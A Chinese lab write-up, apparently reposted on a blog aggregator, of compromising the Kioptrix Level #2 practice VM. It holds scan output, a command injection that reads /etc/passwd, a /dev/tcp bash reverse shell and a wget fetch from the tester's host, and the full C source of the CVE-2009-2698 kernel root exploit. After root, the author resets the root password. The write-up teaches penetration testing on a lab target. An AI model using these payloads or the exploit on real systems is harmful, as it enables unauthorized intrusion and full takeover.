+ http://192.168.1.10/manual/ko/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/faq/ ----
+ http://192.168.1.10/manual/ko/faq/index.html (CODE:200|SIZE:3371)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/howto/ ----
+ http://192.168.1.10/manual/ko/howto/index.html (CODE:200|SIZE:5299)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/misc/ ----
+ http://192.168.1.10/manual/ko/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/mod/ ----
+ http://192.168.1.10/manual/ko/mod/index.html (CODE:200|SIZE:12795)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/programs/ ----
+ http://192.168.1.10/manual/ko/programs/index.html (CODE:200|SIZE:4543)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/ssl/ ----
+ http://192.168.1.10/manual/ko/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/developer/ ----
+ http://192.168.1.10/manual/ru/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/faq/ ----
+ http://192.168.1.10/manual/ru/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/howto/ ----
+ http://192.168.1.10/manual/ru/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/misc/ ----
+ http://192.168.1.10/manual/ru/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/mod/ ----
+ http://192.168.1.10/manual/ru/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/programs/ ----
+ http://192.168.1.10/manual/ru/programs/index.html (CODE:200|SIZE:5016)                                                                                                                                                          
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/ssl/ ----
+ http://192.168.1.10/manual/ru/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Jun  9 10:25:00 2024
DOWNLOADED: 262884 - FOUND: 102

2.4.2 dirsearch目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.1.10 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.1.10/_24-06-09_10-13-18.txt

Target: https://192.168.1.10/

[10:13:18] Starting: 
[10:13:33] 403 -  292B  - /.ht_wsr.txt                                      
[10:13:34] 403 -  295B  - /.htaccess.bak1                                   
[10:13:34] 403 -  295B  - /.htaccess.orig                                   
[10:13:34] 403 -  293B  - /.htaccessBAK
[10:13:34] 403 -  293B  - /.htaccessOLD
[10:13:34] 403 -  295B  - /.htaccess.save                                   
[10:13:34] 403 -  296B  - /.htaccess_extra                                  
[10:13:34] 403 -  295B  - /.htaccess_orig
[10:13:34] 403 -  293B  - /.htaccess_sc
[10:13:34] 403 -  297B  - /.htaccess.sample
[10:13:34] 403 -  285B  - /.htm                                             
[10:13:34] 403 -  295B  - /.htpasswd_test                                   
[10:13:34] 403 -  291B  - /.htpasswds
[10:13:34] 403 -  294B  - /.htaccessOLD2                                    
[10:13:34] 403 -  286B  - /.html                                            
[10:13:35] 403 -  292B  - /.httr-oauth                                      
[10:14:57] 403 -  289B  - /cgi-bin/                                         
[10:15:25] 403 -  287B  - /error/                                           
[10:16:06] 301 -  315B  - /manual  ->  https://192.168.1.10/manual/         
[10:16:07] 200 -    7KB - /manual/index.html                                
[10:17:22] 403 -  286B  - /usage                                            
                                                                             
Task Completed

测试结果显示,获得一些目录
102个目录…
主要围绕http://192.168.1.10/manual/展开

2.5 漏洞切入点

2.5.1 访问登录页

访问链接:
http://192.168.1.10
登录页

2.5.2 访问manual页

测试链接:
http://192.168.1.10/manual/
manual

2.5.3 nikto

┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.1.10
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.10
+ Target Hostname:    192.168.1.10
+ Target Port:        80
+ Start Time:         2024-06-09 10:31:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ /: Retrieved x-powered-by header: PHP/4.3.9.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /manual/: Uncommon header 'tcn' found, with contents: choice.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8909 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-06-09 10:32:23 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

2.5.4 sql注入

2.5.4.1 sqlmap
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u http://192.168.1.10/index.php --forms --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:41:36 /2024-06-09/

[10:41:36] [INFO] testing connection to the target URL
[10:41:36] [INFO] searching for forms
[1/1] Form:
POST http://192.168.1.10/index.php
POST data: uname=&psw=&btnLogin=Login
do you want to test this form? [Y/n/q] 
> Y


do you want to fill blank fields with random values? [Y/n] Y
[10:41:51] [INFO] using '/root/.local/share/sqlmap/output/results-06092024_1041am.csv' as the CSV results file in multiple targets mode
[10:41:51] [INFO] testing if the target URL content is stable
[10:41:52] [INFO] target URL content is stable
[10:41:52] [INFO] testing if POST parameter 'uname' is dynamic
[10:41:52] [WARNING] POST parameter 'uname' does not appear to be dynamic
[10:41:52] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[10:41:52] [INFO] testing for SQL injection on POST parameter 'uname'
[10:41:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:41:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:41:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:41:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:41:52] [INFO] testing 'Generic inline queries'
[10:41:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:41:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:41:52] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:41:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:41:55] [WARNING] POST parameter 'uname' does not seem to be injectable
[10:41:55] [INFO] testing if POST parameter 'psw' is dynamic
[10:41:55] [WARNING] POST parameter 'psw' does not appear to be dynamic
[10:41:55] [WARNING] heuristic (basic) test shows that POST parameter 'psw' might not be injectable
[10:41:55] [INFO] testing for SQL injection on POST parameter 'psw'
[10:41:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:41:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:41:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:41:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:41:55] [INFO] testing 'Generic inline queries'
[10:41:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:41:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:41:55] [INFO] testing 'Oracle AND time-based blind'
[10:41:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:41:55] [WARNING] POST parameter 'psw' does not seem to be injectable
[10:41:55] [INFO] testing if POST parameter 'btnLogin' is dynamic
[10:41:55] [WARNING] POST parameter 'btnLogin' does not appear to be dynamic
[10:41:55] [WARNING] heuristic (basic) test shows that POST parameter 'btnLogin' might not be injectable
[10:41:55] [INFO] testing for SQL injection on POST parameter 'btnLogin'
[10:41:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:56] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:41:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:41:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:41:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:41:56] [INFO] testing 'Generic inline queries'
[10:41:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:41:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:41:56] [INFO] testing 'Oracle AND time-based blind'
[10:41:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:41:56] [WARNING] POST parameter 'btnLogin' does not seem to be injectable
[10:41:56] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next target
[10:41:56] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-06092024_1041am.csv'

[*] ending @ 10:41:56 /2024-06-09/

无果而终。

2.5.4.2 sql注入

admin
登录成功


三、渗透测试

3.1 尝试注入命令

3.1.1 id

127.0.0.1;id

127.0.0.1;id
id

有返回信息,可以执行远程命令

3.1.2 passwd

127.0.0.1;cat /etc/passwd
passwd
passwd
可以访问系统文件

3.2 反弹shell

3.2.1 kali监听端口

┌──(root?kali)-[/home/kali]
└─# nc -lvvp 10086       
listening on [any] 10086 ...

bash终端已经显示,监听端口10086

3.2.2 命令注入

注入命令:127.0.0.1;bash -i>&/dev/tcp/192.168.1.111/10086 0>&1

bash

┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 10086       
listening on [any] 10086 ...
192.168.1.10: inverse host lookup failed: Unknown host
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.10] 32832
bash: no job control in this shell
bash-3.00$ 
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

成功获得shell。
此时此刻,kali监听端已经获得了反弹shell,成功进入系统,但权限还不是root,下一步进行提权操作。

3.3 系统提权

3.3.1 系统信息

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Linux 2.6.9

3.3.2 发行版本

bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)

CentOS release 4.5 (Final)

3.3.3 漏洞搜索

┌──(root㉿kali)-[/home/kali]
└─# searchsploit centos 4.5
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                   |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)                                                            | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)                                                             | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation                                                                                                                    | linux/local/35370.c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

可利用脚本:
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ‘ip_append_data()’ Ring0 Privilege Escalation (1) | linux_x86/local/9542.c

3.3.4 脚本文件下载

执行命令:

searchsploit -m 9542.c
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# searchsploit -m 9542.c
  Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
      URL: https://www.exploit-db.com/exploits/9542
     Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
    Codes: CVE-2009-2698
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/dev_run_app/vulhub/kl_2/9542.c


                                                                                                                                                                                                                                   
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# ls
9542.c

脚本文件下载成功。

3.3.5 查看脚本

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# cat 9542.c
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

// milw0rm.com [2009-08-31]                                                                                                                                                                                                        

脚本中已经给出使用方法。

3.3.6 kali开启http服务

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# python -m http.server 8086
Serving HTTP on 0.0.0.0 port 8086 (http://0.0.0.0:8086/) ...

开启http服务成功。

3.3.7 上传脚本

bash-3.00$ cd /tmp
bash-3.00$ ls
bash-3.00$ pwd
/tmp
bash-3.00$ wget http://192.168.1.111:8086/9542.c
--08:10:40--  http://192.168.1.111:8086/9542.c
           => `9542.c'
Connecting to 192.168.1.111:8086... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]

    0K ..                                                    100%   10.24 MB/s

08:10:40 (10.24 MB/s) - `9542.c' saved [2535/2535]

bash-3.00$ ls
9542.c

成功上传脚本文件。

3.3.8 编译并执行脚本

bash-3.00$ gcc -o 0x82-CVE-2009-2698 9542.c && ./0x82-CVE-2009-2698
9542.c:109:28: warning: no newline at end of file
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

获得root权限成功。

3.4 修改密码

sh-3.00# passwd
New UNIX password: 123456
BAD PASSWORD: it is too simplistic/systematic
Retype new UNIX password: 123456
Changing password for user root.
passwd: all authentication tokens updated successfully.

成功将系统的密码修改为
123456

O(∩_∩)O哈哈~

3.5 ssh登录

Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh root@192.168.1.10


Connecting to 192.168.1.10:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

Last login: Thu Feb  9 22:41:01 2012
/usr/X11R6/bin/xauth:  creating new authority file /root/.Xauthority
[root@kioptrix ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@kioptrix ~]# 

成功登录到远程ssh


渗透总结

在本次Kioptrix Level #2靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、反弹shell、linux内核提权等内容:

  • 主机发现
  • 目录扫描
  • 端口扫描
  • netcat监听
  • 反弹shell
  • linux内核提权

参考文章

  • Kioptrix Level #2靶场
  • arp-scan使用
  • Netdiscover基本使用
  • nmap详细使用教程
  • 黑客工具之whatweb详细使用教程
  • dirsearch - Web path discovery
  • Netcat - 你需要知道的一切
  • Kioptrix Level #2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1807307.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

打字侠是一款PWA网站,如何下载到电脑桌面?

嘿&#xff0c;亲爱的键盘侠们&#xff01; 你是否还在为寻找一款好用的打字练习工具而烦恼&#xff1f;别担心&#xff0c;今天我要给大家介绍一位超级英雄——打字侠&#xff01;它不仅是一个超级酷的打字练习网站&#xff0c;还是一款PWA&#xff08;渐进式网页应用&#x…

Python程序操作MySQL数据库教程

1.Python程序操作MySQL数据库&#xff1a; 使用pymysql安装包 使用&#xff1a; 1.导入pysql包 import pymysql 2.创建连接对象 调用pymysql模块中的connect&#xff08;&#xff09;函数来创建连接对象&#xff0c;代码如下&#xff1a; 连接对象说明&#xff1a; 关闭连接 co…

JAVA:通过电信ctg.ag.sdk从电信物联平台AIOT获取设备上报数据的简单示例

一、问题场景 物联设备比如NB设备通过NB协议将数据传到电信平台后&#xff0c;我们的应用服务如何从电信平台获取可用的上报数据。以下通过电信开发者平台提供的SDK来简单演示下整个过程。 二、使用电信 SDK进行开发 电信AIOT物联平台提供了两种方式获取平台数据&#xff0c…

Virtual Memory Primitives for User Program翻译

Virtual Memory Primitives for User Program 安德鲁阿普尔&#xff08;Andrew Appel&#xff09;和李凯&#xff08;Kai Li&#xff09; 普林斯顿大学计算机科学系 摘要 传统上&#xff0c;内存管理单元&#xff08;MMUS&#xff09;被操作系统用于实现磁盘分页的虚拟内存…

cisco packet tracer 8.2.2 安装配置 基础教程 免登录免破解 简单方便

1 官网下载&#xff0c;需要账号 2 安装 3 启动之前&#xff0c;直接断网&#xff0c;禁用网卡(⊙﹏⊙) #汉化 #重新打开Cisco Packet Tracer

Apollo9.0 PNC源码学习之Control模块(一)

0 前言 从planning的角度看control&#xff0c;首先需要了解的就是相关的数据接口&#xff0c;规划出的轨迹&#xff08;路径速度&#xff09;发给Control模块去执行 modules/planning/planning_component/planning_component.cc planning模块发布轨迹信息 planning_writer_ …

计算机网络9——无线网络和移动网络2无线个人区域网 WPAN

文章目录 一、蓝牙系统二、低速 WPAN三、高速 WPAN 无线个人区域网WPAN(Wireless Personal Area Network)就是在个人工作的地方把属于个人使用的电子设备(如便携式电脑、平板电脑、便携式打印机以及蜂窝电话等)用无线技术连接起来自组网络&#xff0c;不需要使用接入点AP&#…

DP:回文串模型

一、回文子串 . - 力扣&#xff08;LeetCode&#xff09; 该题有3种解法 &#xff08;1&#xff09;中心扩展算法&#xff08;在字符串章节有介绍&#xff09;时间复杂度O&#xff08;N^2&#xff09;,空间复杂度O&#xff08;1&#xff09; &#xff08;2&#xff09;马丁车…

小冬瓜AIGC 手撕LLM 拼课

小冬瓜aigc手撕LLM学习 官方认证 手撕LLMRLHF速成班-(附赠LLM加速分布式训练超长文档&#xff09; 帮助多名同学上岸LLM方向&#xff0c;包括高校副教授&#xff0c;北美PhD&#xff0c;大厂等 课程名称【手撕LLMRLHF】 授课形式&#xff1a;在线会议直播讲解课后录播 时间&…

Nvidia的成功与竞争:CEO黄仁勋的自信与挑战

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗&#xff1f;订阅我们的简报&#xff0c;深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同&#xff0c;从行业内部的深度分析和实用指南中受益。不要错过这个机会&#xff0c;成为AI领…

【将xml文件转yolov5训练数据txt标签文件】连classes.txt都可以生成

将xml文件转yolov5训练数据txt标签文件 前言一、代码解析 二、使用方法总结 前言 找遍全网&#xff0c;我觉得写得最详细的就是这个博文⇨将xml文件转yolov5训练数据txt标签文件 虽然我还是没有跑成功。那个正则表达式我不会改QWQ&#xff0c;但是不妨碍我会训练ai。 最终成功…

LangChain基础知识入门

LangChain的介绍和入门 1 什么是LangChain LangChain由 Harrison Chase 创建于2022年10月&#xff0c;它是围绕LLMs&#xff08;大语言模型&#xff09;建立的一个框架&#xff0c;LLMs使用机器学习算法和海量数据来分析和理解自然语言&#xff0c;GPT3.5、GPT4是LLMs最先进的代…

架构设计-用户信息及用户相关的密码信息设计

将用户的基本信息和用户密码存放在不同的数据库表中是一种常见的安全做法&#xff0c;这种做法旨在增强数据的安全性和管理的灵活性。以下是这种做法的几个关键原因&#xff1a; 安全性增强&#xff1a; 当用户密码被单独存放在一个表中时&#xff0c;可以使用更强大的加密和哈…

kafka集成SpringBoot api编写教程

1.新建项目 用的idea是20222.1.3版本&#xff0c;没有Spring Initializr 插件&#xff0c;不能直接创建springboot项目 可以在以下网址创建项目&#xff0c;下载后解压&#xff0c;然后用idea打开项目即可 1.1 在 https://start.spring.io/ 上创建项目 1.2上传到linux&#x…

C语言 | Leetcode C语言题解之第140题单词拆分II

题目&#xff1a; 题解&#xff1a; struct Trie {int ch[26];bool flag; } trie[10001];int size;void insert(char* s, int sSize) {int add 0;for (int i 0; i < sSize; i) {int x s[i] - a;if (trie[add].ch[x] 0) {trie[add].ch[x] size;memset(trie[size].ch, 0…

读AI未来进行式笔记07量子计算

1. AI审讯技术 1.1. 发明者最初的目的是发明一种能够替代精神药物&#xff0c;为人类带来终极快乐的技术 1.1.1. 遗憾的是&#xff0c;他找到的只是通往反方向的大门 1.2. 通过非侵入式的神经电磁干扰大脑边缘系统&#xff0c;诱发受审者最…

配置 JDK 和 Android SDK

目录 一、配置JDK 1. 安装 JDK 2. JDK 环境配置 3. JDK的配置验证 二、配置 adb 和Android SDK环境 1、下载 2、配置 Android SDK 环境 一、配置JDK 1. 安装 JDK 安装链接&#xff1a;Java Downloads | Oracle 我安装的是 .zip &#xff0c;直接在指定的文件夹下解压就…

[沉迷理论]进制链表树

往期文章推荐&#xff1a; 题解之最大子矩阵-CSDN博客 洛谷P1115最大子段和[神奇的题目]-CSDN博客 &#xff08;一条神奇的分割线&#xff09; 前言 好久没有更新的我总算在百忙之中抽出时间写了篇博客。 最近总算结束了动态规划的学习&#xff0c;真的是头昏脑涨啊。 最…

论文阅读——MIRNet

项目地址&#xff1a; GitHub - swz30/MIRNet: [ECCV 2020] Learning Enriched Features for Real Image Restoration and Enhancement. SOTA results for image denoising, super-resolution, and image enhancement.GitHub - soumik12345/MIRNet: Tensorflow implementation…

【云岚到家】-day02-1-区域服务后续开发及完善

